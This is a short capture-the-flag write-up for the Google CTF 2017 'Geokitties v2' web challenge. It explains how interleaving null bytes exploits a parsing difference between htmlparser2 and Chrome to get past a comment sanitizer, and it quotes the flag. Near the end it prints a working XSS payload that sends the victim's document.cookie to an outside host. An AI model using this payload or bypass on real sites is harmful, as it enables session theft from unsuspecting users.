Google CTF 2017 – Geokitties v2 writeup

Overview

It receives comment, then admin checks it and clicks a link.

The comment is validated by using htmlparser2.

Allowed tags are: p, a, b, img, br, i
Invalid attributes: on(.*)= and href=javascript:...

What we should do is find the differences in parsing between Google Chrome and htmlparser2.

After some time, I realize that when input is utf-16 string, Chrome parses it as utf-16 string but htmlparser2 does not.

For example, the html below is parsed as html element \x00a\x00 in htmlparser2.

\x00<\x00a\x00>\x00<\x00/\x00a\x00>\x00

<\x00a\x00> is not a valid tag, so we should create a valid html link like below.

\x00<a \x00>\x00<\x00/\x00a\x00>\x00

Now, htmlparser2 recognize a html tag but chrome does not recognize it as html element.

So we can construct an valid html <a href=javascript:....

'\x00<a \x00' + "<a href='javascript:location.href=`//tyage.net/`+document.cookie'>".split('').join('\x00') + '</a>'

Finally, admin gives us a flag: CTF{i_HoPe_YoU_fOunD_tHe_IntEndeD_SolUTioN_tHis_Time}